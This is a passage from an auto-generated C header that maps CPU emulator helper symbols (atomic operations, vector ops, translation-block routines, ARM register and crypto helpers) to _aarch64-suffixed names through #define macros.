helper_atomic_xor_fetchw_le_aarch64 #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_aarch64 #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_aarch64 #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_aarch64 #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_aarch64 #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_aarch64 #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_aarch64 #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_aarch64 #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_aarch64 #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_aarch64 #define helper_atomic_xchgw_be helper_atomic_xchgw_be_aarch64 #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_aarch64 #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_aarch64 #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_aarch64 #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_aarch64 #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_aarch64 #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_aarch64 #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_aarch64 #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_aarch64 #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_aarch64 #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_aarch64 #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_aarch64 #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_aarch64 #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_aarch64 #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_aarch64 #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_aarch64 #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_aarch64 #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_aarch64 #define helper_atomic_xchgl_le helper_atomic_xchgl_le_aarch64 #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_aarch64 #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_aarch64 #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_aarch64 #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_aarch64 #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_aarch64 #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_aarch64 #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_aarch64 #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_aarch64 #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_aarch64 #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_aarch64 #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_aarch64 #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_aarch64 #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_aarch64 #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_aarch64 #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_aarch64 #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_aarch64 #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_aarch64 #define helper_atomic_xchgl_be helper_atomic_xchgl_be_aarch64 #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_aarch64 #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_aarch64 #define helper_atomic_fetch_xorl_be 
helper_atomic_fetch_xorl_be_aarch64 #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_aarch64 #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_aarch64 #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_aarch64 #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_aarch64 #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_aarch64 #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_aarch64 #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_aarch64 #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_aarch64 #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_aarch64 #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_aarch64 #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_aarch64 #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_aarch64 #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_aarch64 #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_aarch64 #define helper_atomic_xchgq_le helper_atomic_xchgq_le_aarch64 #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_aarch64 #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_aarch64 #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_aarch64 #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_aarch64 #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_aarch64 #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_aarch64 #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_aarch64 #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_aarch64 #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_aarch64 #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_aarch64 #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_aarch64 #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_aarch64 #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_aarch64 #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_aarch64 #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_aarch64 #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_aarch64 #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_aarch64 #define helper_atomic_xchgq_be helper_atomic_xchgq_be_aarch64 #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_aarch64 #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_aarch64 #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_aarch64 #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_aarch64 #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_aarch64 #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_aarch64 #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_aarch64 #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_aarch64 #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_aarch64 #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_aarch64 #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_aarch64 #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_aarch64 #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_aarch64 #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_aarch64 #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_aarch64 #define helper_atomic_add_fetchq_be 
helper_atomic_add_fetchq_be_aarch64 #define cpu_ldub_code cpu_ldub_code_aarch64 #define cpu_lduw_code cpu_lduw_code_aarch64 #define cpu_ldl_code cpu_ldl_code_aarch64 #define cpu_ldq_code cpu_ldq_code_aarch64 #define helper_div_i32 helper_div_i32_aarch64 #define helper_rem_i32 helper_rem_i32_aarch64 #define helper_divu_i32 helper_divu_i32_aarch64 #define helper_remu_i32 helper_remu_i32_aarch64 #define helper_shl_i64 helper_shl_i64_aarch64 #define helper_shr_i64 helper_shr_i64_aarch64 #define helper_sar_i64 helper_sar_i64_aarch64 #define helper_div_i64 helper_div_i64_aarch64 #define helper_rem_i64 helper_rem_i64_aarch64 #define helper_divu_i64 helper_divu_i64_aarch64 #define helper_remu_i64 helper_remu_i64_aarch64 #define helper_muluh_i64 helper_muluh_i64_aarch64 #define helper_mulsh_i64 helper_mulsh_i64_aarch64 #define helper_clz_i32 helper_clz_i32_aarch64 #define helper_ctz_i32 helper_ctz_i32_aarch64 #define helper_clz_i64 helper_clz_i64_aarch64 #define helper_ctz_i64 helper_ctz_i64_aarch64 #define helper_clrsb_i32 helper_clrsb_i32_aarch64 #define helper_clrsb_i64 helper_clrsb_i64_aarch64 #define helper_ctpop_i32 helper_ctpop_i32_aarch64 #define helper_ctpop_i64 helper_ctpop_i64_aarch64 #define helper_lookup_tb_ptr helper_lookup_tb_ptr_aarch64 #define helper_exit_atomic helper_exit_atomic_aarch64 #define helper_gvec_add8 helper_gvec_add8_aarch64 #define helper_gvec_add16 helper_gvec_add16_aarch64 #define helper_gvec_add32 helper_gvec_add32_aarch64 #define helper_gvec_add64 helper_gvec_add64_aarch64 #define helper_gvec_adds8 helper_gvec_adds8_aarch64 #define helper_gvec_adds16 helper_gvec_adds16_aarch64 #define helper_gvec_adds32 helper_gvec_adds32_aarch64 #define helper_gvec_adds64 helper_gvec_adds64_aarch64 #define helper_gvec_sub8 helper_gvec_sub8_aarch64 #define helper_gvec_sub16 helper_gvec_sub16_aarch64 #define helper_gvec_sub32 helper_gvec_sub32_aarch64 #define helper_gvec_sub64 helper_gvec_sub64_aarch64 #define helper_gvec_subs8 helper_gvec_subs8_aarch64 #define helper_gvec_subs16 helper_gvec_subs16_aarch64 #define helper_gvec_subs32 helper_gvec_subs32_aarch64 #define helper_gvec_subs64 helper_gvec_subs64_aarch64 #define helper_gvec_mul8 helper_gvec_mul8_aarch64 #define helper_gvec_mul16 helper_gvec_mul16_aarch64 #define helper_gvec_mul32 helper_gvec_mul32_aarch64 #define helper_gvec_mul64 helper_gvec_mul64_aarch64 #define helper_gvec_muls8 helper_gvec_muls8_aarch64 #define helper_gvec_muls16 helper_gvec_muls16_aarch64 #define helper_gvec_muls32 helper_gvec_muls32_aarch64 #define helper_gvec_muls64 helper_gvec_muls64_aarch64 #define helper_gvec_neg8 helper_gvec_neg8_aarch64 #define helper_gvec_neg16 helper_gvec_neg16_aarch64 #define helper_gvec_neg32 helper_gvec_neg32_aarch64 #define helper_gvec_neg64 helper_gvec_neg64_aarch64 #define helper_gvec_abs8 helper_gvec_abs8_aarch64 #define helper_gvec_abs16 helper_gvec_abs16_aarch64 #define helper_gvec_abs32 helper_gvec_abs32_aarch64 #define helper_gvec_abs64 helper_gvec_abs64_aarch64 #define helper_gvec_mov helper_gvec_mov_aarch64 #define helper_gvec_dup64 helper_gvec_dup64_aarch64 #define helper_gvec_dup32 helper_gvec_dup32_aarch64 #define helper_gvec_dup16 helper_gvec_dup16_aarch64 #define helper_gvec_dup8 helper_gvec_dup8_aarch64 #define helper_gvec_not helper_gvec_not_aarch64 #define helper_gvec_and helper_gvec_and_aarch64 #define helper_gvec_or helper_gvec_or_aarch64 #define helper_gvec_xor helper_gvec_xor_aarch64 #define helper_gvec_andc helper_gvec_andc_aarch64 #define helper_gvec_orc helper_gvec_orc_aarch64 #define 
helper_gvec_nand helper_gvec_nand_aarch64 #define helper_gvec_nor helper_gvec_nor_aarch64 #define helper_gvec_eqv helper_gvec_eqv_aarch64 #define helper_gvec_ands helper_gvec_ands_aarch64 #define helper_gvec_xors helper_gvec_xors_aarch64 #define helper_gvec_ors helper_gvec_ors_aarch64 #define helper_gvec_shl8i helper_gvec_shl8i_aarch64 #define helper_gvec_shl16i helper_gvec_shl16i_aarch64 #define helper_gvec_shl32i helper_gvec_shl32i_aarch64 #define helper_gvec_shl64i helper_gvec_shl64i_aarch64 #define helper_gvec_shr8i helper_gvec_shr8i_aarch64 #define helper_gvec_shr16i helper_gvec_shr16i_aarch64 #define helper_gvec_shr32i helper_gvec_shr32i_aarch64 #define helper_gvec_shr64i helper_gvec_shr64i_aarch64 #define helper_gvec_sar8i helper_gvec_sar8i_aarch64 #define helper_gvec_sar16i helper_gvec_sar16i_aarch64 #define helper_gvec_sar32i helper_gvec_sar32i_aarch64 #define helper_gvec_sar64i helper_gvec_sar64i_aarch64 #define helper_gvec_shl8v helper_gvec_shl8v_aarch64 #define helper_gvec_shl16v helper_gvec_shl16v_aarch64 #define helper_gvec_shl32v helper_gvec_shl32v_aarch64 #define helper_gvec_shl64v helper_gvec_shl64v_aarch64 #define helper_gvec_shr8v helper_gvec_shr8v_aarch64 #define helper_gvec_shr16v helper_gvec_shr16v_aarch64 #define helper_gvec_shr32v helper_gvec_shr32v_aarch64 #define helper_gvec_shr64v helper_gvec_shr64v_aarch64 #define helper_gvec_sar8v helper_gvec_sar8v_aarch64 #define helper_gvec_sar16v helper_gvec_sar16v_aarch64 #define helper_gvec_sar32v helper_gvec_sar32v_aarch64 #define helper_gvec_sar64v helper_gvec_sar64v_aarch64 #define helper_gvec_eq8 helper_gvec_eq8_aarch64 #define helper_gvec_ne8 helper_gvec_ne8_aarch64 #define helper_gvec_lt8 helper_gvec_lt8_aarch64 #define helper_gvec_le8 helper_gvec_le8_aarch64 #define helper_gvec_ltu8 helper_gvec_ltu8_aarch64 #define helper_gvec_leu8 helper_gvec_leu8_aarch64 #define helper_gvec_eq16 helper_gvec_eq16_aarch64 #define helper_gvec_ne16 helper_gvec_ne16_aarch64 #define helper_gvec_lt16 helper_gvec_lt16_aarch64 #define helper_gvec_le16 helper_gvec_le16_aarch64 #define helper_gvec_ltu16 helper_gvec_ltu16_aarch64 #define helper_gvec_leu16 helper_gvec_leu16_aarch64 #define helper_gvec_eq32 helper_gvec_eq32_aarch64 #define helper_gvec_ne32 helper_gvec_ne32_aarch64 #define helper_gvec_lt32 helper_gvec_lt32_aarch64 #define helper_gvec_le32 helper_gvec_le32_aarch64 #define helper_gvec_ltu32 helper_gvec_ltu32_aarch64 #define helper_gvec_leu32 helper_gvec_leu32_aarch64 #define helper_gvec_eq64 helper_gvec_eq64_aarch64 #define helper_gvec_ne64 helper_gvec_ne64_aarch64 #define helper_gvec_lt64 helper_gvec_lt64_aarch64 #define helper_gvec_le64 helper_gvec_le64_aarch64 #define helper_gvec_ltu64 helper_gvec_ltu64_aarch64 #define helper_gvec_leu64 helper_gvec_leu64_aarch64 #define helper_gvec_ssadd8 helper_gvec_ssadd8_aarch64 #define helper_gvec_ssadd16 helper_gvec_ssadd16_aarch64 #define helper_gvec_ssadd32 helper_gvec_ssadd32_aarch64 #define helper_gvec_ssadd64 helper_gvec_ssadd64_aarch64 #define helper_gvec_sssub8 helper_gvec_sssub8_aarch64 #define helper_gvec_sssub16 helper_gvec_sssub16_aarch64 #define helper_gvec_sssub32 helper_gvec_sssub32_aarch64 #define helper_gvec_sssub64 helper_gvec_sssub64_aarch64 #define helper_gvec_usadd8 helper_gvec_usadd8_aarch64 #define helper_gvec_usadd16 helper_gvec_usadd16_aarch64 #define helper_gvec_usadd32 helper_gvec_usadd32_aarch64 #define helper_gvec_usadd64 helper_gvec_usadd64_aarch64 #define helper_gvec_ussub8 helper_gvec_ussub8_aarch64 #define helper_gvec_ussub16 helper_gvec_ussub16_aarch64 
#define helper_gvec_ussub32 helper_gvec_ussub32_aarch64 #define helper_gvec_ussub64 helper_gvec_ussub64_aarch64 #define helper_gvec_smin8 helper_gvec_smin8_aarch64 #define helper_gvec_smin16 helper_gvec_smin16_aarch64 #define helper_gvec_smin32 helper_gvec_smin32_aarch64 #define helper_gvec_smin64 helper_gvec_smin64_aarch64 #define helper_gvec_smax8 helper_gvec_smax8_aarch64 #define helper_gvec_smax16 helper_gvec_smax16_aarch64 #define helper_gvec_smax32 helper_gvec_smax32_aarch64 #define helper_gvec_smax64 helper_gvec_smax64_aarch64 #define helper_gvec_umin8 helper_gvec_umin8_aarch64 #define helper_gvec_umin16 helper_gvec_umin16_aarch64 #define helper_gvec_umin32 helper_gvec_umin32_aarch64 #define helper_gvec_umin64 helper_gvec_umin64_aarch64 #define helper_gvec_umax8 helper_gvec_umax8_aarch64 #define helper_gvec_umax16 helper_gvec_umax16_aarch64 #define helper_gvec_umax32 helper_gvec_umax32_aarch64 #define helper_gvec_umax64 helper_gvec_umax64_aarch64 #define helper_gvec_bitsel helper_gvec_bitsel_aarch64 #define cpu_restore_state cpu_restore_state_aarch64 #define page_collection_lock page_collection_lock_aarch64 #define page_collection_unlock page_collection_unlock_aarch64 #define free_code_gen_buffer free_code_gen_buffer_aarch64 #define tcg_exec_init tcg_exec_init_aarch64 #define tb_cleanup tb_cleanup_aarch64 #define tb_flush tb_flush_aarch64 #define tb_phys_invalidate tb_phys_invalidate_aarch64 #define tb_gen_code tb_gen_code_aarch64 #define tb_exec_lock tb_exec_lock_aarch64 #define tb_exec_unlock tb_exec_unlock_aarch64 #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_aarch64 #define tb_invalidate_phys_range tb_invalidate_phys_range_aarch64 #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_aarch64 #define tb_check_watchpoint tb_check_watchpoint_aarch64 #define cpu_io_recompile cpu_io_recompile_aarch64 #define tb_flush_jmp_cache tb_flush_jmp_cache_aarch64 #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_aarch64 #define translator_loop_temp_check translator_loop_temp_check_aarch64 #define translator_loop translator_loop_aarch64 #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_aarch64 #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_aarch64 #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_aarch64 #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_aarch64 #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_aarch64 #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_aarch64 #define unassigned_mem_ops unassigned_mem_ops_aarch64 #define floatx80_infinity floatx80_infinity_aarch64 #define dup_const_func dup_const_func_aarch64 #define gen_helper_raise_exception gen_helper_raise_exception_aarch64 #define gen_helper_raise_interrupt gen_helper_raise_interrupt_aarch64 #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_aarch64 #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_aarch64 #define gen_helper_cpsr_read gen_helper_cpsr_read_aarch64 #define gen_helper_cpsr_write gen_helper_cpsr_write_aarch64 #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_aarch64 #define cpu_aarch64_init cpu_aarch64_init_aarch64 #define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_aarch64 #define arm_cpu_update_virq arm_cpu_update_virq_aarch64 #define arm_cpu_update_vfiq arm_cpu_update_vfiq_aarch64 #define arm_cpu_initfn arm_cpu_initfn_aarch64 #define gt_cntfrq_period_ns gt_cntfrq_period_ns_aarch64 #define arm_cpu_post_init arm_cpu_post_init_aarch64 #define arm_cpu_realizefn 
arm_cpu_realizefn_aarch64 #define arm_cpu_class_init arm_cpu_class_init_aarch64 #define cpu_arm_init cpu_arm_init_aarch64 #define helper_crypto_aese helper_crypto_aese_aarch64 #define helper_crypto_aesmc helper_crypto_aesmc_aarch64 #define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_aarch64 #define helper_crypto_sha1h helper_crypto_sha1h_aarch64 #define helper_crypto_sha1su1 helper_crypto_sha1su1_aarch64 #define helper_crypto_sha256h helper_crypto_sha256h_aarch64 #define helper_crypto_sha256h2 helper_crypto_sha256h2_aarch64 #define helper_crypto_sha256su0 helper_crypto_sha256su0_aarch64 #define helper_crypto_sha256su1 helper_crypto_sha256su1_aarch64 #define helper_crypto_sha512h helper_crypto_sha512h_aarch64 #define helper_crypto_sha512h2 helper_crypto_sha512h2_aarch64 #define helper_crypto_sha512su0 helper_crypto_sha512su0_aarch64 #define helper_crypto_sha512su1 helper_crypto_sha512su1_aarch64 #define helper_crypto_sm3partw1 helper_crypto_sm3partw1_aarch64 #define helper_crypto_sm3partw2 helper_crypto_sm3partw2_aarch64 #define helper_crypto_sm3tt helper_crypto_sm3tt_aarch64 #define helper_crypto_sm4e helper_crypto_sm4e_aarch64 #define helper_crypto_sm4ekey helper_crypto_sm4ekey_aarch64 #define helper_check_breakpoints helper_check_breakpoints_aarch64 #define arm_debug_check_watchpoint arm_debug_check_watchpoint_aarch64 #define arm_debug_excp_handler arm_debug_excp_handler_aarch64 #define arm_adjust_watchpoint_address arm_adjust_watchpoint_address_aarch64 #define helper_udiv64 helper_udiv64_aarch64 #define helper_sdiv64 helper_sdiv64_aarch64 #define helper_rbit64 helper_rbit64_aarch64 #define helper_msr_i_spsel helper_msr_i_spsel_aarch64 #define helper_msr_i_daifset helper_msr_i_daifset_aarch64 #define helper_msr_i_daifclear helper_msr_i_daifclear_aarch64 #define helper_vfp_cmph_a64 helper_vfp_cmph_a64_aarch64 #define helper_vfp_cmpeh_a64 helper_vfp_cmpeh_a64_aarch64 #define helper_vfp_cmps_a64 helper_vfp_cmps_a64_aarch64 #define helper_vfp_cmpes_a64 helper_vfp_cmpes_a64_aarch64 #define helper_vfp_cmpd_a64 helper_vfp_cmpd_a64_aarch64 #define helper_vfp_cmped_a64 helper_vfp_cmped_a64_aarch64 #define helper_vfp_mulxs helper_vfp_mulxs_aarch64 #define helper_vfp_mulxd helper_vfp_mulxd_aarch64 #define helper_simd_tbl helper_simd_tbl_aarch64 #define helper_neon_ceq_f64 helper_neon_ceq_f64_aarch64 #define helper_neon_cge_f64 helper_neon_cge_f64_aarch64 #define helper_neon_cgt_f64 helper_neon_cgt_f64_aarch64 #define helper_recpsf_f16 helper_recpsf_f16_aarch64 #define helper_recpsf_f32 helper_recpsf_f32_aarch64 #define helper_recpsf_f64 helper_recpsf_f64_aarch64 #define helper_rsqrtsf_f16 helper_rsqrtsf_f16_aarch64 #define helper_rsqrtsf_f32 helper_rsqrtsf_f32_aarch64 #define helper_rsqrtsf_f64 helper_rsqrtsf_f64_aarch64 #define helper_neon_addlp_s8 helper_neon_addlp_s8_aarch64 #define helper_neon_addlp_u8 helper_neon_addlp_u8_aarch64 #define helper_neon_addlp_s16 helper_neon_addlp_s16_aarch64 #define helper_neon_addlp_u16 helper_neon_addlp_u16_aarch64 #define helper_frecpx_f16 helper_frecpx_f16_aarch64 #define helper_frecpx_f32 helper_frecpx_f32_aarch64 #define helper_frecpx_f64 helper_frecpx_f64_aarch64 #define helper_fcvtx_f64_to_f32 helper_fcvtx_f64_to_f32_aarch64 #define helper_crc32_64 helper_crc32_64_aarch64 #define helper_crc32c_64 helper_crc32c_64_aarch64 #define helper_paired_cmpxchg64_le helper_paired_cmpxchg64_le_aarch64 #define helper_paired_cmpxchg64_le_parallel helper_paired_cmpxchg64_le_parallel_aarch64 #define helper_paired_cmpxchg64_be helper_paired_cmpxchg64_be_aarch64 
#define helper_paired_cmpxchg64_be_parallel helper_paired_cmpxchg64_be_parallel_aarch64
#define helper_casp_le_parallel helper_casp_le_parallel_aarch64
#define helper_casp_be_parallel helper_casp_be_parallel_aarch64
#define helper_advsimd_addh helper_advsimd_addh_aarch64
#define helper_advsimd_subh helper_advsimd_subh_aarch64
#define helper_advsimd_mulh helper_advsimd_mulh_aarch64
#define helper_advsimd_divh helper_advsimd_divh_aarch64
#define helper_advsimd_minh helper_advsimd_minh_aarch64
#define helper_advsimd_maxh helper_advsimd_maxh_aarch64
#define helper_advsimd_minnumh helper_advsimd_minnumh_aarch64
#define helper_advsimd_maxnumh helper_advsimd_maxnumh_aarch64
#define helper_advsimd_add2h helper_advsimd_add2h_aarch64
#define helper_advsimd_sub2h helper_advsimd_sub2h_aarch64
#define helper_advsimd_mul2h helper_advsimd_mul2h_aarch64
#define helper_advsimd_div2h helper_advsimd_div2h_aarch64
#define helper_advsimd_min2h helper_advsimd_min2h_aarch64
#define helper_advsimd_max2h helper_advsimd_max2h_aarch64
#define helper_advsimd_minnum2h helper_advsimd_minnum2h_aarch64
#define helper_advsimd_maxnum2h helper_advsimd_maxnum2h_aarch64
#define helper_advsimd_mulxh helper_advsimd_mulxh_aarch64
#define helper_advsimd_mulx2h helper_advsimd_mulx2h_aarch64
#define helper_advsimd_muladdh helper_advsimd_muladdh_aarch64
#define helper_advsimd_muladd2h helper_advsimd_muladd2h_aarch64
#define helper_advsimd_ceq_f16 helper_advsimd_ceq_f16_aarch64
#define helper_advsimd_cge_f16 helper_advsimd_cge_f16_aarch64
#define helper_advsimd_cgt_f16 helper_advsimd_cgt_f16_aarch64
#define helper_advsimd_acge_f16 helper_advsimd_acge_f16_aarch64
#define helper_advsimd_acgt_f16 helper_advsimd_acgt_f16_aarch64
#define helper_advsimd_rinth_exact helper_advsimd_rinth_exact_aarch64
#define helper_advsimd_rinth helper_advsimd_rinth_aarch64
#define helper_advsimd_f16tosinth helper_advsimd_f16tosinth_aarch64
#define helper_advsimd_f16touinth helper_advsimd_f16touinth_aarch64
#define helper_exception_return helper_exception_return_aarch64
#define helper_sqrt_f16 helper_sqrt_f16_aarch64
#define helper_dc_zva helper_dc_zva_aarch64
#define read_raw_cp_reg read_raw_cp_reg_aarch64
#define pmu_init pmu_init_aarch64
#define pmu_op_start pmu_op_start_aarch64
#define pmu_op_finish pmu_op_finish_aarch64
#define pmu_pre_el_change pmu_pre_el_change_aarch64
#define pmu_post_el_change pmu_post_el_change_aarch64
#define arm_pmu_timer_cb arm_pmu_timer_cb_aarch64
#define arm_gt_ptimer_cb arm_gt_ptimer_cb_aarch64
#define arm_gt_vtimer_cb arm_gt_vtimer_cb_aarch64
#define arm_gt_htimer_cb arm_gt_htimer_cb_aarch64
#define arm_gt_stimer_cb arm_gt_stimer_cb_aarch64
#define arm_gt_hvtimer_cb arm_gt_hvtimer_cb_aarch64
#define arm_hcr_el2_eff arm_hcr_el2_eff_aarch64
#define sve_exception_el sve_exception_el_aarch64
#define sve_zcr_len_for_el sve_zcr_len_for_el_aarch64
#define hw_watchpoint_update hw_watchpoint_update_aarch64
#define hw_watchpoint_update_all hw_watchpoint_update_all_aarch64
#define hw_breakpoint_update hw_breakpoint_update_aarch64
#define hw_breakpoint_update_all hw_breakpoint_update_all_aarch64
#define register_cp_regs_for_features register_cp_regs_for_features_aarch64
#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_aarch64
#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_aarch64
#define modify_arm_cp_regs modify_arm_cp_regs_aarch64
#define get_arm_cp_reginfo get_arm_cp_reginfo_aarch64
#define arm_cp_write_ignore arm_cp_write_ignore_aarch64
#define arm_cp_read_zero arm_cp_read_zero_aarch64
#define arm_cp_reset_ignore arm_cp_reset_ignore_aarch64
#define cpsr_read cpsr_read_aarch64
#define cpsr_write cpsr_write_aarch64
#define helper_sxtb16 helper_sxtb16_aarch64
#define helper_uxtb16 helper_uxtb16_aarch64
#define helper_sdiv helper_sdiv_aarch64
#define helper_udiv helper_udiv_aarch64
#define helper_rbit helper_rbit_aarch64
#define arm_phys_excp_target_el arm_phys_excp_target_el_aarch64
#define aarch64_sync_32_to_64 aarch64_sync_32_to_64_aarch64
#define aarch64_sync_64_to_32 aarch64_sync_64_to_32_aarch64
#define arm_cpu_do_interrupt arm_cpu_do_interrupt_aarch64
#define arm_sctlr arm_sctlr_aarch64
#define arm_s1_regime_using_lpae_format arm_s1_regime_using_lpae_format_aarch64
#define aa64_va_parameters aa64_va_parameters_aarch64
#define v8m_security_lookup v8m_security_lookup_aarch64
#define pmsav8_mpu_lookup pmsav8_mpu_lookup_aarch64
#define get_phys_addr get_phys_addr_aarch64
#define arm_cpu_get_phys_page_attrs_debug arm_cpu_get_phys_page_attrs_debug_aarch64
#define helper_qadd16 helper_qadd16_aarch64
#define helper_qadd8 helper_qadd8_aarch64
#define helper_qsub16 helper_qsub16_aarch64
#define helper_qsub8 helper_qsub8_aarch64
#define helper_qsubaddx helper_qsubaddx_aarch64
#define helper_qaddsubx helper_qaddsubx_aarch64
#define helper_uqadd16 helper_uqadd16_aarch64
#define helper_uqadd8 helper_uqadd8_aarch64
#define helper_uqsub16 helper_uqsub16_aarch64
#define helper_uqsub8 helper_uqsub8_aarch64
#define helper_uqsubaddx helper_uqsubaddx_aarch64
#define helper_uqaddsubx helper_uqaddsubx_aarch64
#define helper_sadd16 helper_sadd16_aarch64
#define helper_sadd8 helper_sadd8_aarch64
#define helper_ssub16 helper_ssub16_aarch64
#define helper_ssub8 helper_ssub8_aarch64
#define helper_ssubaddx helper_ssubaddx_aarch64
#define helper_saddsubx helper_saddsubx_aarch64
#define helper_uadd16 helper_uadd16_aarch64
#define helper_uadd8 helper_uadd8_aarch64
#define helper_usub16 helper_usub16_aarch64
#define helper_usub8 helper_usub8_aarch64
#define helper_usubaddx helper_usubaddx_aarch64
#define helper_uaddsubx helper_uaddsubx_aarch64
#define helper_shadd16 helper_shadd16_aarch64
#define helper_shadd8 helper_shadd8_aarch64
#define helper_shsub16 helper_shsub16_aarch64
#define helper_shsub8 helper_shsub8_aarch64
#define helper_shsubaddx helper_shsubaddx_aarch64
#define helper_shaddsubx helper_shaddsubx_aarch64
#define helper_uhadd16 helper_uhadd16_aarch64
#define helper_uhadd8 helper_uhadd8_aarch64
#define helper_uhsub16 helper_uhsub16_aarch64
#define helper_uhsub8 helper_uhsub8_aarch64
#define helper_uhsubaddx helper_uhsubaddx_aarch64
